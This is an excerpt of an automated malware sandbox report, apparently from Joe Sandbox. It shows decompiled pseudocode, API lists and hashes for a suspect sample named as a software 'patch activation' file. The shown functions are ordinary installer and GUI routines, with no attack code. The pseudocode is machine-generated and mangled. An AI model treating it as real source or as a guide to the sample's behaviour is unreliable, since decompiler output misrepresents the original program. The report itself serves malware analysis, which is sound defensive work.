					GetObjectA( *(_t166 - 0x38), 0x18, _t166 - 0x5c);
					_t132 =  *(_t166 - 0x68) *  *(_t166 - 0x6c) * ( *(_t166 - 0x64) & 0x0000ffff);
					 *(_t166 - 0x40) =  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff);
					 *((intOrPtr*)(_t166 - 0x18)) =  *(_t166 - 0x40) + _t132;
					 *(_t166 - 0x34) = E00406E6C( *((intOrPtr*)(_t166 - 0x18)),  *(_t166 - 0x50) *  *(_t166 - 0x54) * ( *(_t166 - 0x4c) & 0x0000ffff) >> 0x20, _t158, 0);
					_push(_t166);
					_push(0x41c485);
					_push( *[fs:eax]);
					 *[fs:eax] = _t167;
					_t159 =  *(_t166 - 0x34);
					_t162 =  &(( *(_t166 - 0x34))[_t132]);
					GetBitmapBits( *(_t166 - 0x3c), _t132, _t159);
					GetBitmapBits( *(_t166 - 0x38),  *(_t166 - 0x40), _t162);
					DeleteObject( *(_t166 - 0x38));
					DeleteObject( *(_t166 - 0x3c));
					_t118 =  *0x49e014; // 0x400000
					 *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) = CreateIcon(_t118,  *(_t166 - 0x28),  *(_t166 - 0x24),  *(_t166 - 0x4c),  *(_t166 - 0x4a), _t159, _t162);
					if( *((intOrPtr*)( *((intOrPtr*)(_t166 - 8)))) == 0) {
						E0041B824();
					}
					_pop(_t150);
					 *[fs:eax] = _t150;
					_push(E0041C48C);
					return E00402660( *(_t166 - 0x34));
				} else {
					_t140 = _t134 + 1;
					_t125 = 0;
					while(1) {
						_t154 =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
						_t164 =  *(_t166 - 0x1a) & 0x0000ffff;
						if(_t154 == _t164) {
							break;
						}
						__eflags = _t127 - 0xffffffff;
						if(_t127 != 0xffffffff) {
							__eflags = _t154 -  *(_t166 - 0x20);
							if(_t154 >  *(_t166 - 0x20)) {
								_t127 = _t125;
							}
						} else {
							__eflags = _t164 - _t154;
							if(_t164 >= _t154) {
								_t127 = _t125;
								 *(_t166 - 0x20) =  *( *((intOrPtr*)(_t166 - 0x10)) + 2 + (_t125 + _t125) * 8) & 0x0000ffff;
							}
						}
						_t125 = _t125 + 1;
						_t140 = _t140 - 1;
						__eflags = _t140;
						if(__eflags != 0) {
							continue;
						} else {
							goto L10;
						}
					}
					_t127 = _t125;
					goto L10;
				}
			}

0x0041c2f3
0x0041c2f3
0x0041c2f8
0x0041c2fe
0x0041c301
0x0041c345
0x0041c348
0x0041c34a
0x0041c34a
0x0041c356
0x0041c364
0x0041c372
0x0041c38c
0x0041c39f
0x0041c3a9
0x0041c3b8
0x0041c3c7
0x0041c3d7
0x0041c3e6
0x0041c3ee
0x0041c3f9
0x0041c3fe
0x0041c3ff
0x0041c404
0x0041c407
0x0041c40a
0x0041c410
0x0041c418
0x0041c426
0x0041c42f
0x0041c438
0x0041c44f
0x0041c45d
0x0041c465
0x0041c467
0x0041c467
0x0041c46e
0x0041c471
0x0041c474
0x0041c484
0x0041c303
0x0041c303
0x0041c304
0x0041c306
0x0041c30d
0x0041c312
0x0041c318
0x00000000
0x00000000
0x0041c31e
0x0041c321
0x0041c33a
0x0041c33d
0x0041c33f
0x0041c33f
0x0041c323
0x0041c323
0x0041c325
0x0041c327
0x0041c335
0x0041c335
0x0041c325
0x0041c341
0x0041c342
0x0041c342
0x0041c343
0x00000000
0x00000000
0x00000000
0x00000000
0x0041c343
0x0041c31a
0x00000000
0x0041c31a

APIs

GetObjectA.GDI32(?,00000018,?), ref: 0041C3B8
GetObjectA.GDI32(?,00000018,?), ref: 0041C3C7
GetBitmapBits.GDI32(?,?,?), ref: 0041C418
GetBitmapBits.GDI32(?,?,?), ref: 0041C426
DeleteObject.GDI32(?), ref: 0041C42F
DeleteObject.GDI32(?), ref: 0041C438
CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041C455

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Object$BitmapBitsDelete$CreateIcon
String ID:
API String ID: 1030595962-0
Opcode ID: ec19989a10235cbf9a1edf4f8eb35756c5d910f1ff26f4107efc2cfff39a000d
Instruction ID: 503a746306143f5d70b37ccc37edd8169d972c8c437de2bc6362dd1504a2ea70
Opcode Fuzzy Hash: ec19989a10235cbf9a1edf4f8eb35756c5d910f1ff26f4107efc2cfff39a000d
Instruction Fuzzy Hash: 52511831E002199FCB14DFE9C8819EEB7F9EF48314B10852AF914E7391D638AD81CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0041D368 Relevance: 10.7, APIs: 7, Instructions: 152
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041D368(void* __eax, void* __ebx, int* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HPALETTE__* _v12;
				char _v13;
				char _v14;
				char _t59;
				struct HPALETTE__* _t65;
				void* _t76;
				void* _t83;
				void* _t110;
				intOrPtr _t126;
				intOrPtr _t128;
				intOrPtr _t129;
				intOrPtr _t131;
				int* _t133;
				void* _t135;
				void* _t136;
				intOrPtr _t137;

				_t111 = __ecx;
				_t135 = _t136;
				_t137 = _t136 + 0xfffffff4;
				_t133 = __ecx;
				_v8 = __edx;
				_t110 = __eax;
				if(E0041D5CC(__eax) == 0) {
					SetStretchBltMode(E0041B524(_v8), 3);
				}
				if( *((intOrPtr*)(_t110 + 0x14)) == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0x10)) + 0xc)) == 0) {
					if((GetDeviceCaps(E0041B524(_v8), 0x26) & 0x00000020) == 0 ||  *((char*)( *((intOrPtr*)(_t110 + 0x10)) + 0x25)) != 1 ||  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0x10)) + 8)) == 0 || E0040CEDC( *((intOrPtr*)( *((intOrPtr*)(_t110 + 0x10)) + 8))) == 0) {
						goto L9;
					} else {
						_t59 = 0;
					}
				} else {
					L9:
					_t59 = 1;
				}
				_v13 = _t59;
				_t131 =  *((intOrPtr*)(_t110 + 0x10));
				_t126 =  *0x41d504; // 0xf
				E0041B5F8(_v8, _t111, _t126, _t131);
				E0041D6E8(_t110);
				_v12 = 0;
				_v14 = 0;
				_t65 =  *(_t131 + 0x10);
				if(_t65 != 0) {
					_v12 = SelectPalette( *(_v8 + 4), _t65, 1);
					RealizePalette( *(_v8 + 4));
					_v14 = 1;
				}
				_push(_t135);
				_push(0x41d4f5);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t137;
				if(_v13 == 0) {
					StretchDIBits( *(_v8 + 4),  *_t133, _t133[1], _t133[2] -  *_t133, _t133[3] - _t133[1], 0, 0,  *(_t131 + 0x14),  *(_t131 + 0x18),  *(_t131 + 0x20),  *(_t131 + 0x1c), 0,  *(_v8 + 0x20));
				} else {
					_t76 = E0041D560(_t110, 0, _t126);
					_t129 =  *0x41d504; // 0xf
					E0041B5F8(_t76, 0, _t129, _t131);
					_t83 = E0041D560(_t110, 0, _t129);
					StretchBlt(E0041B524(_v8),  *_t133, _t133[1], _t133[2] -  *_t133, _t133[3] - _t133[1],  *(_t83 + 4), 0, 0,  *(_t131 + 0x14),  *(_t131 + 0x18),  *(_v8 + 0x20));
				}
				_pop(_t128);
				 *[fs:eax] = _t128;
				_push(0x41d4fc);
				if(_v14 != 0) {
					return SelectPalette( *(_v8 + 4), _v12, 1);
				}
				return 0;
			}

0x0041d368
0x0041d369
0x0041d36b
0x0041d371
0x0041d373
0x0041d376
0x0041d381
0x0041d38e
0x0041d38e
0x0041d397
0x0041d3b5
0x00000000
0x0041d3d8
0x0041d3d8
0x0041d3d8
0x0041d3dc
0x0041d3dc
0x0041d3dc
0x0041d3dc
0x0041d3de
0x0041d3e1
0x0041d3e4
0x0041d3ed
0x0041d3f4
0x0041d3fb
0x0041d3fe
0x0041d402
0x0041d407
0x0041d418
0x0041d422
0x0041d427
0x0041d427
0x0041d42d
0x0041d42e
0x0041d433
0x0041d436
0x0041d43d
0x0041d4ca
0x0041d43f
0x0041d441
0x0041d446
0x0041d44c
0x0041d466
0x0041d48c
0x0041d48c
0x0041d4d1
0x0041d4d4
0x0041d4d7
0x0041d4e0
0x00000000
0x0041d4ef
0x0041d4f4

APIs

SetStretchBltMode.GDI32(00000000,00000003), ref: 0041D38E
GetDeviceCaps.GDI32(00000000,00000026), ref: 0041D3AD
SelectPalette.GDI32(?,?,00000001), ref: 0041D413
RealizePalette.GDI32(?), ref: 0041D422
StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041D48C
StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D4CA
SelectPalette.GDI32(?,?,00000001), ref: 0041D4EF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
String ID:
API String ID: 2222416421-0
Opcode ID: 04b102cceab6519e9c3a92a55d02afe56828cc33fe19e53c7d712d938cb733d8
Instruction ID: 994e6928e375576195bbff131da20e2633e51e8889d6c5a0b4bc55991cd6db0b
Opcode Fuzzy Hash: 04b102cceab6519e9c3a92a55d02afe56828cc33fe19e53c7d712d938cb733d8
Instruction Fuzzy Hash: 10512FB0A00604AFD714DFA9C985F9AB7F9EF08304F148599B959D7292C778ED80CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00457B6C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00457B6C(int __eax, void* __ebx, long __ecx, char __edx, void* __edi, void* __esi, char* _a4) {
				char _v5;
				char _v6;
				char _v12;
				intOrPtr _v16;
				struct tagMSG _v44;
				char _v48;
				struct HWND__* _t31;
				intOrPtr _t33;
				intOrPtr _t42;
				void* _t46;
				char _t47;
				intOrPtr _t51;
				char* _t61;
				intOrPtr _t68;
				intOrPtr _t73;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xffffffd4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v48 = 0;
				_v12 = 0;
				_t78 = __ecx;
				_v5 = __edx;
				_t76 = __eax;
				_t61 = _a4;
				_push(_t80);
				_push(0x457cd6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				_v6 = 0;
				 *_t61 = 0;
				if( *0x49f010 == 0) {
					L10:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(0x457cdd);
					E00403400( &_v48);
					return E00403400( &_v12);
				} else {
					 *0x49f024 = 0;
					_t31 =  *0x49f01c; // 0x0
					if(SendMessageA(_t31, __eax, 0, __ecx) == 0) {
						goto L10;
					} else {
						_v6 = 1;
						_t33 =  *0x49e62c; // 0x2252410
						E0042470C(_t33,  &_v12);
						_v16 = E0041F334(0, _t61, _t76, _t78);
						_push(_t80);
						_push(0x457c84);
						_push( *[fs:eax]);
						 *[fs:eax] = _t82;
						E00403494( &_v48, "[Paused] ");
						E0040357C( &_v48, _v12);
						_t42 =  *0x49e62c; // 0x2252410
						E00424754(_t42, _v48, _t76);
						while( *0x49f024 == 0) {
							_t46 = GetMessageA( &_v44, 0, 0, 0) - 0xffffffff;
							if(_t46 != 0) {
								if(_t46 == 1) {
									PostQuitMessage(_v44.wParam);
								} else {
									TranslateMessage( &_v44);
									DispatchMessageA( &_v44);
									continue;
								}
							}
							break;
						}
						_t47 =  *0x49f025; // 0x0
						 *_t61 = _t47;
						_pop(_t73);
						 *[fs:eax] = _t73;
						_push(0x457c8b);
						E0041F3E8(_v16);
						_t51 =  *0x49e62c; // 0x2252410
						return E00424754(_t51, _v12, _t76);
					}
				}
			}

0x00457b6d
0x00457b6f
0x00457b72
0x00457b73
0x00457b74
0x00457b77
0x00457b7a
0x00457b7d
0x00457b7f
0x00457b82
0x00457b84
0x00457b89
0x00457b8a
0x00457b8f
0x00457b92
0x00457b95
0x00457b99
0x00457ba3
0x00457cb8
0x00457cba
0x00457cbd
0x00457cc0
0x00457cc8
0x00457cd5
0x00457ba9
0x00457ba9
0x00457bb8
0x00457bc5
0x00000000
0x00457bcb
0x00457bcb
0x00457bd2
0x00457bd7
0x00457be3
0x00457be8
0x00457be9
0x00457bee
0x00457bf1
0x00457bfc
0x00457c07
0x00457c0f
0x00457c14
0x00457c51
0x00457c2a
0x00457c2d
0x00457c30
0x00457c38
0x00457c32
0x00457c43
0x00457c4c
0x00000000
0x00457c4c
0x00457c30
0x00000000
0x00457c2d
0x00457c5a
0x00457c5f
0x00457c63
0x00457c66
0x00457c69
0x00457c71
0x00457c79
0x00457c83
0x00457c83
0x00457bc5

APIs

SendMessageA.USER32 ref: 00457BBE

Part of subcall function 0042470C: GetWindowTextA.USER32 ref: 0042472C

Part of subcall function 0041F334: GetCurrentThreadId.KERNEL32 ref: 0041F383
Part of subcall function 0041F334: EnumThreadWindows.USER32(00000000,0041F2E4,00000000), ref: 0041F389

Part of subcall function 00424754: SetWindowTextA.USER32(?,00000000), ref: 0042476C

GetMessageA.USER32 ref: 00457C25
TranslateMessage.USER32(?), ref: 00457C43
DispatchMessageA.USER32 ref: 00457C4C

Strings

[Paused] , xrefs: 00457BF4

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
String ID: [Paused]
API String ID: 1007367021-4230553315
Opcode ID: 243bd422c61f2622546d11c945774c602dc8f4b1793521091e356525211c3557
Instruction ID: 06e1226616be40fe5bc559768a91633e97e499603686e5a952697563b4c26b81
Opcode Fuzzy Hash: 243bd422c61f2622546d11c945774c602dc8f4b1793521091e356525211c3557
Instruction Fuzzy Hash: 523195319082485EDB12DBB5E841BDE7BF8DB49304F908077E810E7292D63C9909CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0046C9CC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
sleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0046C9CC(void* __ebx, void* __ecx, void* __edi, struct HICON__* __esi, void* __eflags, void* __fp0, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				struct HICON__* _t56;
				intOrPtr _t68;
				void* _t73;
				intOrPtr _t81;
				void* _t91;
				void* _t101;

				_t101 = __fp0;
				_t88 = __esi;
				_t87 = __edi;
				_push(__esi);
				_push(__edi);
				_v8 = 0;
				_push(_t91);
				_push(0x46cb0b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t91 + 0xfffffff4;
				_t73 = 0;
				E00414F78( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)),  &_v8, __eflags);
				if(( *0x49f31c & 0x00000004) != 0) {
					_t73 = E0047B170(_v8);
				}
				if(_t73 == 0) {
					_t96 =  *0x49f490;
					if( *0x49f490 != 0) {
						_v16 = _v8;
						_v12 = 0xb;
						_t68 =  *0x49f490; // 0x23113e0
						_t73 = E00497C0C(_t68,  &_v16, "CheckPassword", _t96, _t101, _t73, 0, 0);
					}
				}
				if(_t73 == 0) {
					_t40 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t40 + 0x37));
					if( *((char*)(_t40 + 0x37)) != 0) {
						_t56 = GetCursor();
						_t88 = _t56;
						SetCursor(LoadCursorA(0, 0x7f02));
						Sleep(0x2ee);
						SetCursor(_t56);
					}
					_t41 =  *0x49edc4; // 0x230ca18
					E00481214(_t41, _t73, 2, 0, _t87, _t88, 1, 1, 0);
					_t44 =  *((intOrPtr*)(_a4 - 4));
					__eflags =  *((char*)(_t44 + 0x37));
					if( *((char*)(_t44 + 0x37)) != 0) {
						__eflags = 0;
						E00414FA8( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)), _t73, 0, _t87, _t88);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)))) + 0x78))();
					}
				} else {
					 *0x49f44a = 0;
					if(( *0x49f31f & 0x00000020) != 0) {
						E00403450(E0046EA34() + 0x138, _t73, _v8, _t87, _t88);
					}
					E00414FA8( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x21c)), _t73, 0, _t87, _t88);
				}
				_pop(_t81);
				 *[fs:eax] = _t81;
				_push(0x46cb12);
				return E00403400( &_v8);
			}

0x0046c9cc
0x0046c9cc
0x0046c9cc
0x0046c9d3
0x0046c9d4
0x0046c9d7
0x0046c9dc
0x0046c9dd
0x0046c9e2
0x0046c9e5
0x0046c9e8
0x0046c9f9
0x0046ca05
0x0046ca0f
0x0046ca0f
0x0046ca13
0x0046ca15
0x0046ca1c
0x0046ca26
0x0046ca29
0x0046ca35
0x0046ca3f
0x0046ca3f
0x0046ca1c
0x0046ca43
0x0046ca7f
0x0046ca82
0x0046ca86
0x0046ca88
0x0046ca8d
0x0046ca9c
0x0046caa6
0x0046caac
0x0046caac
0x0046cabb
0x0046cac0
0x0046cac8
0x0046cacb
0x0046cacf
0x0046cadd
0x0046cadf
0x0046caf2
0x0046caf2
0x0046ca45
0x0046ca45
0x0046ca53
0x0046ca62
0x0046ca62
0x0046ca75
0x0046ca75
0x0046caf7
0x0046cafa
0x0046cafd
0x0046cb0a

APIs

GetCursor.USER32(00000000,0046CB0B), ref: 0046CA88
LoadCursorA.USER32 ref: 0046CA96
SetCursor.USER32(00000000,00000000,00007F02,00000000,0046CB0B), ref: 0046CA9C
Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046CB0B), ref: 0046CAA6
SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046CB0B), ref: 0046CAAC

Strings

CheckPassword, xrefs: 0046CA30

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Cursor$LoadSleep
String ID: CheckPassword
API String ID: 4023313301-1302249611
Opcode ID: 08ee5b51b9b00d0a6f93a4b86ee2d0cb8d12275db51ad74ec0d0ce5009a6854c
Instruction ID: dc4a4552949694c44ab81909cbfa5d37629526438aba0b0bd6801612213ae34e
Opcode Fuzzy Hash: 08ee5b51b9b00d0a6f93a4b86ee2d0cb8d12275db51ad74ec0d0ce5009a6854c
Instruction Fuzzy Hash: 10318234740244AFD711DB69C8CAFAA7BE4AF05304F5580B6B944AB3E2D778AE40CB49

Uniqueness

Uniqueness Score: -1.00%

Function 00479DE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00479DE0(void* __eax, intOrPtr __ecx, intOrPtr* __edx, void* __edi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v10;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v24;
				char _v28;
				signed int _v32;
				void* __ebx;
				void* __esi;
				void* __ebp;
				struct HWND__* _t28;
				long _t36;
				void* _t41;
				signed short _t45;
				signed short _t47;
				signed int _t50;
				signed int _t58;
				long _t59;
				void* _t73;
				intOrPtr* _t74;
				signed short _t76;

				_t73 = __edi;
				_t62 = __ecx;
				_v8 = __ecx;
				_t74 = __edx;
				_v24 = __eax;
				_v20 = E0040CEDC( *__edx);
				_v16 =  *((intOrPtr*)( *_t74 + 4));
				E00479D08(_t62);
				_t28 =  *0x49f0e8; // 0x0
				_t58 = SendMessageA(_t28, 0x4a, 0,  &_v24);
				E0042E814(_t74);
				if(_t58 == 0x6c840001) {
					E00409090();
				}
				if((_t58 & 0xffff0000) != 0x6c830000) {
					_v32 = _t58;
					_v28 = 0;
					E00453B9C("CallSpawnServer: Unexpected response: $%x", _t58, 0,  &_v32, _t73, _t74, 0);
				}
				_v10 = _t58;
				_t59 = GetTickCount();
				while(1) {
					_v8();
					_t36 = GetTickCount();
					if(_t36 - _t59 < 0xa) {
						goto L9;
					}
					_t59 = _t36;
					_t76 = E00479D64(_v10);
					_t41 = _t76 - 2;
					if(_t41 == 0) {
						goto L9;
					}
					if(_t41 - 0xffffffffffffffff >= 0) {
						_v32 = _t76 & 0x0000ffff;
						_v28 = 0;
						E00453B9C("CallSpawnServer: Unexpected status: %d", _t59, 0,  &_v32, _t73, _t76, 0);
						goto L9;
					}
					_t45 = E00479D64(_v10);
					_t47 = E00479D64(_v10);
					_t50 = _a4;
					 *_t50 = _t45 & 0x0000ffff | (_t47 & 0x0000ffff) << 0x00000010;
					__eflags = _t76 - 3;
					_t20 = _t76 == 3;
					__eflags = _t20;
					return _t50 & 0xffffff00 | _t20;
					L9:
					MsgWaitForMultipleObjects(0, 0, 0, 0xa, 0xff);
				}
			}

0x00479de0
0x00479de0
0x00479de8
0x00479deb
0x00479ded
0x00479df7
0x00479dff
0x00479e02
0x00479e0f
0x00479e1a
0x00479e1e
0x00479e29
0x00479e2b
0x00479e2b
0x00479e3c
0x00479e3e
0x00479e41
0x00479e4f
0x00479e4f
0x00479e54
0x00479e5f
0x00479e61
0x00479e61
0x00479e64
0x00479e70
0x00000000
0x00000000
0x00479e72
0x00479e82
0x00479e86
0x00479e8a
0x00000000
0x00000000
0x00479e91
0x00479e96
0x00479e99
0x00479ea7
0x00000000
0x00479ea7
0x00479ec9
0x00479eda
0x00479ee7
0x00479eea
0x00479eec
0x00479ef0
0x00479ef0
0x00479ef8
0x00479eac
0x00479eb9
0x00479eb9

APIs

Part of subcall function 00479D08: GetWindowThreadProcessId.USER32(00000000), ref: 00479D10
Part of subcall function 00479D08: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00479E07,0049F0AC,00000000), ref: 00479D23
Part of subcall function 00479D08: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00479D29

SendMessageA.USER32 ref: 00479E15
GetTickCount.KERNEL32 ref: 00479E5A
GetTickCount.KERNEL32 ref: 00479E64
MsgWaitForMultipleObjects.USER32 ref: 00479EB9

Strings

CallSpawnServer: Unexpected status: %d, xrefs: 00479EA2
CallSpawnServer: Unexpected response: $%x, xrefs: 00479E4A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
API String ID: 613034392-3771334282
Opcode ID: 8f3ce9092d78e5e8ffb09c4fd0b96ce6ea02ef27a8c3c931be51606f83c456ff
Instruction ID: d0290b535038f0b538ca996bd373034cc9ef5a4571df1c0a7e48467b85276075
Opcode Fuzzy Hash: 8f3ce9092d78e5e8ffb09c4fd0b96ce6ea02ef27a8c3c931be51606f83c456ff
Instruction Fuzzy Hash: 82319C34A102149ADB20EBB9C8867EEB7A59F44704F50843BB148EB382D67D8E41C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 0045A014 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0045A014(void* __ebx, signed int __ecx, char __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t24;
				signed int _t60;
				char _t66;
				intOrPtr _t73;
				void* _t77;
				struct HINSTANCE__* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t83;
				intOrPtr _t84;

				_t78 = __esi;
				_t66 = __edx;
				_t60 = __ecx;
				_t82 = _t83;
				_t84 = _t83 + 0xffffffe8;
				_push(__ebx);
				_push(__esi);
				_v16 = 0;
				_v20 = 0;
				_v12 = 0;
				if(__edx != 0) {
					_t84 = _t84 + 0xfffffff0;
					_t24 = E00402D30(_t24, _t82);
				}
				_t59 = _t60;
				_v5 = _t66;
				_t77 = _t24;
				_push(_t82);
				_push(0x45a117);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00402B30(0);
				E00459CE8(_t60, _t60,  &_v20, 3, _t77, _t78);
				E0042C88C(_v20,  &_v16);
				E004035C0( &_v12, "Fusion.dll", _v16);
				E0040352C( &_v16, E00403738(_v12));
				_t79 = E0042E824(_v16, _t59, 0x8000);
				 *(_t77 + 4) = _t79;
				if(_t79 == 0) {
					_v28 = _v12;
					_v24 = 0xb;
					E00407D84("Failed to load .NET Framework DLL \"%s\"", 0,  &_v28,  &_v16);
					E00453B40(_v16, _t59, _t77, _t79, 0);
				}
				_t20 = _t77 + 4; // 0x626d6573
				_t80 = GetProcAddress( *_t20, "CreateAssemblyCache");
				_t88 = _t80;
				if(_t80 == 0) {
					E00453B40("Failed to get address of .NET Framework CreateAssemblyCache function", _t59, _t77, _t80, _t88);
				}
				_t21 = _t77 + 8; // 0x459be8
				 *_t80(_t21, 0);
				_t89 =  *((intOrPtr*)(_t77 + 8));
				if( *((intOrPtr*)(_t77 + 8)) == 0) {
					E00453B40(".NET Framework CreateAssemblyCache function failed", _t59, _t77, _t80, _t89);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E0045A11E);
				return E00403420( &_v20, 3);
			}

0x0045a014
0x0045a014
0x0045a014
0x0045a015
0x0045a017
0x0045a01a
0x0045a01b
0x0045a01f
0x0045a022
0x0045a025
0x0045a02a
0x0045a02c
0x0045a02f
0x0045a02f
0x0045a034
0x0045a036
0x0045a039
0x0045a03d
0x0045a03e
0x0045a043
0x0045a046
0x0045a04d
0x0045a059
0x0045a064
0x0045a074
0x0045a086
0x0045a098
0x0045a09a
0x0045a09f
0x0045a0a8
0x0045a0ab
0x0045a0b9
0x0045a0c1
0x0045a0c1
0x0045a0cb
0x0045a0d4
0x0045a0d6
0x0045a0d8
0x0045a0df
0x0045a0df
0x0045a0e6
0x0045a0ea
0x0045a0ec
0x0045a0f0
0x0045a0f7
0x0045a0f7
0x0045a0fe
0x0045a101
0x0045a104
0x0045a116

APIs

GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045A0CF

Strings

Fusion.dll, xrefs: 0045A06F
CreateAssemblyCache, xrefs: 0045A0C6
Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045A0DA
Failed to load .NET Framework DLL "%s", xrefs: 0045A0B4
